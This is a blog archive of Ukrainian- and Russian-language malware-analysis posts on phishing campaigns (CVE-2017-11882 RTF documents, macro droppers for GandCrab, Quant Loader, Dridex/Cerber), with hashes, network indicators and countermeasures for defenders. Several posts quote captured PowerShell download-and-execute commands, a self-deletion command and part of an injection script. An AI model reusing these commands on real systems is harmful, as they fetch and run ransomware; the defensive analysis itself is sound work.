Tag Archive | DOC

IOC_doc_rtf11882_190718

Доброго ранку, панове.

Вчора о другій половині дня проходила фішингова розсилка, що містила приманку у вигляді DOCX файлу.

Активація приманки призводила до інфікування системи троянським кодом типу #Razy.

Не дивлячись на те, що усі три частини атаки одразу мали високий рейтинг на VT я хочу розібрати механізм доставки.

Проблеми будуть у тих, хто не оновлює MS Office та не контролює трафік його додатків.

Трохи аналітики

  • доставка у 2 кроки
  • завантаження другого документу – засобами MS word (WINWORD.EXE)
  • завантаження основної частини – засобами редактору формул (EQNEDT32.EXE)
  • не потребує прав Адміністратора
  • payload не кодований (!This program cannot be run in DOS mode.)
  • payload записується у \Program Data\
  • payload здійснює перевірку Public IP

Зразок фішингового листа:

Схема атаки

email attach (DOCX) > document.xml.rels > GET doc (RTF) > 11882 > GET exe > \Program Data\name.exe

крок #1 open docx – document.xml.rels
GET novomet{.} bg/doors/images2/p22.doc

крок #2 open doc (RTF) – 11882
GET novomet{.} bg/doors/images2/p22.exe

крок #3 run exe – check public ip
GET checkip.dyndns{.} org/

Маркери

документ1 – MS Word

SHA-256 a4cdebc96154deb3c3da013d6486c09ebb2a0a508475f5107c8c9a319d70fc15
File name p22.docx
File size 9.88 KB

документ2 – RTF із експлойтом під вразливість редактору формул 11882

SHA-256 f5c35a43c5379d705d3f1575a3859934261a87f27b669cc3ddbf6e601ba00abc
File name p22.doc
File size 15.64 KB

основна частина

SHA-256 d03a4011a87374dbbc7ccf1b8427a95e27f97edae1c1c928da1763343f002708
File name p22.exe > name.exe
File size 280 KB

Мережа

79.124.76.30 novomet{.} bg 80 HEAD /doors/images2/p22.doc Microsoft Office Existence Discovery

79.124.76.30 novomet{.} bg 80 GET /doors/images2/p22.doc Mozilla/4.0

79.124.76.30 novomet{.} bg 80 HEAD /doors/images2/p22.doc Microsoft Office Existence Discovery

79.124.76.30 novomet{.} bg 80 GET /doors/images2/p22.exe Mozilla/4.0

216.146.38.70 checkip.dyndns{.} org GET / HTTP/1.1 n./a

Активність по процесам

Відкриття першого документу спричиняє автоматичне завантаження другого, який є RTF файлом:

Після обробки RTF через експлуатацію 11882 запускається редактор формул, який здійснює завантаження основної частини:

Зверніть увагу, що сайт, який розповсюджує malware містить кілька наборів:

Загалом атака не складна, проте може наробити галасу у тих компаніях, де погано дбають про антивірусний захист та оновлення MS Office.

Контрзаходи

  • Посилення фільтрів пошти
  • Заборона завантаження .exe файлів для непривілейованих користувачів – див. тут
  • Відсікання запитів із нестандартними/пустими/застарілими User Agent на рівні Web Proxy – див. тут
  • Виправлення вразливості 11882 – див. тут
  • Контроль запуску EQNEDT32.EXE
  • Заборона мережевого трафіку для додатків MS Office – див. тут (варіант 1)
  • Контроль створення та запуску нових .exe у C:\Users\ та C:\Program Data\ – див. тут

Будьте уважні та обережні.

VR

IOC_pdf>doc_0218

Усім привіт!.

Хочемо звернути вашу увагу на схему, яка застосовується останніми днями для розповсюдження Dridex, Grancrab Ransomware та QuantLoader.

Станом на ранок 9го лютого звернень по цим зразкам від українських організацій не надходило.

Проте варто підготуватися до застосування такої тактики проти наших систем.

Зразки коду були взяті з http://www.malware-traffic-analysis.net/

Як це виглядає:

  1. Жертва отримує фейкового листа із посиланням на “важливий” документ.
  2. Після завантаження та відкриття PDF жертва бачить пусту сторінку і зображення капчі.
  3. Клік по капчі містить посилання на DOC файл.
  4. При відкритті DOC файлу жертву просять активувати макроси.
  5. Активація макросу призводить до інфікування.

Ознайомте персонал із знімками екрану PDF та DOC файлу.

Попередьте, що зображення можуть замінити.

Забороніть передачу керування від MS Office на CMD та Powershell.

Результат перевірки документів

Схема атаки:

email > URL > PDF > DOC > Maco > Powershell / CMD > GET > .exe

Маркери за 7/02/18 – розповсюдження GrandСrab Ransomware

Активність по процесам:



"C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe" "C:\Users\operator\Desktop\grandcrab\attachments\Feb-3178376.pdf"
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "h11p\\butcaketforthen[.]com/docs/Feb-00974.doc"
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
cmd.exe /c START "" %SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('h11p\\sorinnohoun[.]com/sc1/sct5'));Invoke-GandCrab;Start-Sleep -s 1000000;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('h11p\\sorinnohoun[.]com/sc1/sct5'));Invoke-GandCrab;Start-Sleep -s 1000000;"
C:\Windows\SysWOW64\nslookup.exe
nslookup nomoreransom[.]coin dns1.soprodns[.]ru
"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /f /q
timeout  -c 5

 

Мережева активність:

119.28.111.49      HTTP  370    butcaketforthen[.]com    GET /docs/Feb-00974.doc HTTP/1.1
119.28.111.49      HTTP  127    sorinnohoun[.]com GET /sc1/sct5 HTTP/1.1
151.248.118.75    HTTP  4387  nomoreransom[.]coin      POST /curl.php?token=1018 HTTP/1.1  (application/x-www-form-urlencoded)

Зверніть увагу на “фішку” GrandСrab – використання інакших DNS серверів для резолву серверів контролю 

10.10.10.10 DNS   89               Standard query 0x4908 A ipv4bot.whatismyipaddress[.]com
10.10.10.10 DNS   76               Standard query 0xac2e A dns1.soprodns[.]ru
193.0.179.152      DNS   77               Standard query 0x0002 A nomoreransom[.]coin

Частина скрипта інжекту Powershell

GET /sc1/sct5 HTTP/1.1
Host: sorinnohoun[.]com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Fri, 09 Feb 2018 08:04:51 GMT
Content-Type: application/octet-stream

function Invoke-Inj
{
<#
.SYNOPSIS

This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process,
or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints,
please lead the Notes section (GENERAL NOTES) for information on how to use them.

# # # # #

Маркери за 8/02/18 – розповсюдження Quant Loader

Активність по процесам:

"C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AcroRd32.exe" "C:\Users\operator\Desktop\0820\08.02.2018_7719830.pdf"
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "h11p\\hinenreb[.]com/docs/08.02.2018.doc"
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
C:\Windows\SysWOW64\cmd.exe cmd.exe /c START "" C:\tmp\rozabich8.exe
C:\tmp\rozabich8.exe

Мережева активність:

119.28.111.49      HTTP  364    hinenreb[.]com     GET /docs/08.02.2018.doc HTTP/1.1
119.28.111.49      HTTP  278    pertalted[.]com     GET /p66/yutg5 HTTP/1.1

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Ознайомити персонал із послідовністю атак, показати знімки екранів PDF та DOC файлів – щоб не клацали!
  • Блок макросів, блок посилань у PDF файлах
  • Відстеження спроб виклику nslookup (притаманно інфікуванню GrandCrab)
  • Заборона створення дочірніх процесів (передача керування) MW Office > CMD > Powershell
  • Блокування доступу до мережі Інтернет для процесів Powershell (варіант 1й)
  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Заборона вихідних мережевих зєднань для процесів Powershell
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

PowerShell, або “не довго музика та грала..”

PowerShell

Bruce Wayne: Today you get to say “I told you so.”
Alfred: Today, I don’t want to.
(pauses for several moments)
Alfred: But I did bloody tell you.

У минулому дописі я зробив висновок про те, що нові семпли будуть частіше використовувати вбудовані можливості систем (наприклад, PowerShell). Наступного ж дня після публікації мені надіслали зразок ШПЗ який підтвердив мої слова. Давайте поглянемо на нього разом.

I. Вступ (або як усе могло би закінчитися за ~10 хвилин)

Що повинна робити освічена людина у наш непростий час коли вона отримує підозріле приєднання на кшталт Scan_6_10_2016.doc ? Правильна відповідь – в жодному разі не поспішати відкривати його одразу. Тут варто одразу сказати, що користувачеві у скриньку не повинні потрапляти такі файли, позаяк це говорить про те, що в організації немає “пісочниці” (sandbox), а фільтрація поштових приєднань не налагоджена належним чином. Що ж, ми із вами живемо не в ідеальному світі. Відкривши файл жертва побачить наступне:

macro

Замість очікуваного скану документу ми бачимо прохання активувати макрос.. І тут варто би зупинитися і передати файл на аналіз ІТшникам/ІБшникам.. А що у свою чергу має зробити відповідальний співробітник ІТ/ІБ департаменту? Навіть не відкриваючи файл, не витрачаючи часу на запуск тестової віртуальної машини?

Напевне взяти до рук такий шикарний та перевірений інструмент як oletools (вимагають наявності у системі Python 2.x) і за 15-30 секунд отримати відповідь на головне запитання:

scan_test scan_test3 scan_test2

Так, документ містить макрос який викликає PowerShell і передає йому якусь незрозумілу послідовність інструкцій, яка у свою чергу закінчується такою командою:

final = “POWERSHELL.EXE -ExecutionPolicy bypass -noprofile -windowstyle hidden -Enc ” & first

Загалом, наявність макросу та ще й із передачею команд із параметром “Execution Policy bypass” повинна бути яскравим доказом небезпеки, але … може це все ж таки щось “потрібне по роботі”? (сарказм)

Навіть якщо технічний спеціаліст не володіє базовими навичками роботи із Powershell, усього за кілька хвилин він може знайти опис параметра -Enc :

-Enc, -EncodedCommand <Base64EncodedCommand>

Угу, значить наша загадкова послідовність це команди, що були зашифровані у Base64. Витративши іще пару хвилин, скористаймося першим ліпшим онлайн-декодером. І тоді незрозумілі рядки:

first = “UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1…

Перетворяться на цілком чіткі команди:

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile(‘http://93.174.94.135/~harvy/verfgt.exe&#8217;, $env:APPDATA\verfgt.exe );Start-Process ( $env:APPDATA\verfgt.exe )

macro_listing2

І на цьому моменті можна було би поставити крапку. Я не жартую. Просто взяти до у ваги адресу поштового серверу, з якого прийшов цей лист; самотужки завантажити шкідливий verfgt.exe; надіслати його аналітикам антивірусу (щоб включили в наступні сигнатури); ще раз перевірити правила, що мають блокувати створення та запуск .exe із каталогів %AppData%; і головне – не забути подякувати користувачеві за його обачність.

Ось і все. Справу закрито – можна розійтися, випити чаю/кави чи чогось міцнішого та обговорити більш важливіші події на теренах кіберпростору..

Але про що я кажу, адже якщо ви досі читаєте ці рядки, то ви тут заради аналізу. Тому перейдемо до наступних кроків. Мені просто закортіло навести приклад того, як би мали реагувати користувачі та відділ СБ/ІБ на подібні листи після стількох випадків атак через фішинг.

II. Основна частина (або як буває у 90% випадків)

Очевидно, що ми маємо справу із бінарною кібер-атакою. Адже документ-приманка є нічим іншим, як представником сімейства W97M/Downloader. Задача приманки – ініціювати процес завантаження та запуск основного модуля (другої частини атаки). В даному випадку приманка залучає PowerShell для прихованого завантаження файлу. Основний же модуль є новою версією ransomware – знайомтесь, Cerber. Цей вид ПШЗ застосовується для шифрування документів з метою отримання викупу за відновлення доступу до інформації. Сам Cerber завантажується і запускається із %AppData% (неважко помітити в деобфускованій частині команд – $env:APPDATA).

те недолуге відчуття, коли тебе нарешті почули, але зовсім не ті до кого ти звертався

Так, вони (автори семплів) змінили тактику і використовують для старту інший каталог із системного оточення. Вочевидь, поради блокувати створення нових .exe файлів у %temp% та їх запуск почали заважати бізнесу тих, хто займається атаками чи написанням семплів. Хоча, про %AppData% я написав вперше коли розбирав CTB Locker – уже більше року тому. Просто майте на увазі, коли формуватимете політики безпеки.

Якщо приманка успішно виконала свою задачу, то на скомпрометованій системі починається така активність:

activate

Файл, який був завантажений PowerShell запускається із %AppData% (для Win8 яка виступала у ролі полігону ця змінна лінкує каталог **\Users\*\AppData\Roaming). Після запуску Dridex копіює своє тіло у окремий каталог в середині AppData\Roaming\ із рандомно згенерованим ім’ям (кожна активація призводить до зміни імені). У мене перший запуск дав таку картинку:

verfgt.exe -> charmap.exe, а другий прохід:

verfgt.exe -> srdelayed.exe.

Після копіювання перший процес додає нащадка в автозавантаження (HKU\CurrentVersion\Run, RunOnce та ControlPanel\Desktop\SCRNSAVE.EXE), здійснює пошук присутніх додатків, завершує та видаляє сам себе (семпл який ми розглядали раніше не мав засобів закріплення і не вмів зачищати свої сліди!):

proc_activiry reg_activity

Батьківський процес завершує і видаляє сам себе такою командою:

/d /c taskkill /t /f /im “verfgt.exe” > NUL & ping -n 1 127.0.0.1 > NUL & del “C:\Users\GK17\AppData\Roaming\verfgt.exe” > NUL

Але перед цим проводить такий пошук:

Searched C:\Documents and Setting s\Administrator\StartMenu\Prog rams\StartUp\*.lnk
Searched C:\Documents and Setting s\Default User\StartMenu\Prog rams\StartUp\*.lnk
Searched C:\WINDOWS\system32\g *s.exe
Searched C:\WINDOWS\system32\o*b.exe
Searched C:\WINDOWS\system32\o*h.exe
Searched C:\WINDOWS\system32\t*s.exe
Searched C:\WINDOWS\system32\y*o.exe

Новостворений нащадок, що розташувався за шляхом *\AppData\Roaming\{xxxxxx}\xxxx.exe встановлює з’єднання із C&C сервером, передає йому IP скомпрометованої системи та готується отримати команди:

tcp

(!) Зверніть увагу:

А ще, цей семпл здійснював розсилку UDP пакетів по діапазону IP адрес, що були закріплені за німецьким провайдером. Зміст пакету = hi03a442e

netwrk

upd

Варто зазначити, що обидві мої тестових полігони семплу здалися підозрілими і він, не отримавши команди зовні через кілька хвилин видалив сам себе. Але це його не врятувало, бо я встиг законспектувати його дії.

III. Висновки (поради та маркери компрометації)

Як і у випадку з Java навряд чи заборона PowerShell буде прийнятною мірою для всіх. Організаціям варто посилити фільтрацію поштових приєднань – блокувати або вирізати активний вміст документів до того, як вони потраплять на очі користувачеві. На рівні кінцевих точок необхідно контролювати, хоча би відстежувати, а краще взагалі блокувати спроби створити та запустити новий .exe файл за шляхами %tmp%\ та %AppData%\. Рекомендації щодо проведення співбесід-тренінгів для користувачів та впровадження періодичних тестів на проникнення залишаються в силі. Також не завадить розглянути можливість застосування “пісочниці” (для забезпечення статичного та динамічного аналізу коду), а на кінцевих точках розгорнути рішення, що дозволить працювати із білими списками (обмежити виконання неавторизлваних скриптів/запускних файлів.

P.S.

Головні висновки, які я зробив для себе під час вівісекції цього семплу:

  1. Вони будуть застосовувати механізми ОС та бізнес-додатки для обходу захисту;
  2. Вони поступово припинять писати payload в %temp%;
  3. Вони стають дедалі обережнішими (перевірка параметрів та самознищення у комплекті) – це значить, якщо адмін або ІБшнік прогавили момент активації, то через 5хв на системі жертви уже може бути пусто (або не підійшла, або уже зібрали необхідні дані);
  4. Сигнатури знов не спрацювали у перші 12 годин активності семплу;
  5. У цьому варіанті Dridex присутній претекст, чого раніше не було. Прохання активувати макроси може бути локалізованим та стилізованим під бланки установ фінансової галузі, що збільшить кількість інфікованих.

Маркери компрометації наведено нижче:

Scan_6_10_2016.doc SHA1=5067a8791ed42cb4e2c8a2637c8d400e54c2b9d1

verfgt.exe SHA1=8bd41d2a41f8a375d3de9fdd84f40f3bb17c5298

сервер з якого завантажується payload по 80 TCP = 93.174.94.135

C&C з яким спілкування іде по 80 TCP = 52.29.28.22

розсилка пакетів “hi03a442e” по 6892 UDP = 85.93.0.x

Будьте уважними та обережними при роботі з ІТ.

“Но раны остаются ранами. Они заживают, рубцуются, и вроде бы ты о них уже забыл вовсе, а потом переменится погода, они и заноют.”

MV5BMTU2OTcwMjA0NV5BMl5BanBnXkFtZTcwODI3MjA5Mg@@._V1_SX640_SY720_

VR

Кібератаки на підприємства України

Короткий аналіз атак, у розслідуванні яких приймав участь.
Аналітика. Маркери компрометації. Рекомендації.

Контент доповіді стосується не лише енергетиків і є актуальним як для підприємств державного сектору так і для бізнесу. Розраховано на широкий загал. В першу чергу – на працівників ІТ/ІБ підрозділів.

Кому не зручно переглядати із slideshare, беріть PDF файл (~1,8 Mb).

Будьте обачними та обережними при роботі з електронною поштою.

VR

Первичный анализ очередного фишинга

Краткий разбор свежего семпла подручными средствами (а-ля сам себе sandbox)

И так, приступим к вивисекции.

Пример письма опубликую как только получу разрешение. Если вдруг кто-то забыл, как выглядит типичный современный фишинг – смотрите пример из предыдущей заметки.

В этот раз героем нашего шоу стал … документ MS Word. Внимательные читатели уже догадались – да, файл содержит макрос. Атакующие настолько обленились, что даже картинку-предупреждение не ставят (мол “цей документ було створено у більш новішій версії … активуйте макроси“). Оно и правильно – зачем напрягаться, если 90% потенциальных жертв и так кликнут и запустят.

Но давайте посмотрим – а что же происходит с теми пользователями, которые по неосторожности/незнанию или халатности активируют макрос?

win7

Я ожидал увидеть стандартный подход – извлечение тела дроппера из макроса в %temp% либо %AppData%, но не сложилось. Я сперва огорчился, а потом воспрянул духом – может это и есть тот самый опасный 0-day и этот макрос заставляет WINWORD.EXE делать всю грязную работу?(ууууу)

Но не тут-то было. Видно работали на скорую руку, потому ограничились тупой загрузкой дроппера с одного из файловых серверов, который хоститься во Франции:

GET hxxp://213.186.33.18/~lelodged/43543r34r/843tf.exe

win7-4

Сам IP файлового сервера находиться в зоне риска по GTI:

Screenshot-213.186.33.18 - IP - McAfee Labs Threat Center - Iceweasel (Private Browsing)

Т.е. если бы был IPS либо NGFW, то на этом шаге все бы и закончилось..

После загрузки и запуска оного получаем уже коннект на C&C, который хостится в Санкт-Петербурге:

843tf.exe >> 62.76.191.108

win7-6win7-8win7-9

А вот IP C&C еще не засвеченный потому по GTI пусто:

Screenshot-62.76.191.108 - IP - McAfee Labs Threat Center - Iceweasel (Private Browsing)

EXE-шник, к слову, уже детектится на конечной точке по GTI

Artemis!BBA6C087E282

На сегодня пока все.

IP адреса и документ с EXEшником переданы куда надо.

Следите за обновлениями.

# # # #

Мораль: обучайте своих пользователей распознавать фишинг. Объясняйте почему не стоит сразу открывать подозрительное вложение. И почему не нужно активировать макросы, даже если очень-очень просят или наоборот не просят.

vlcsnap-2016-01-29-00h17m11s026

VR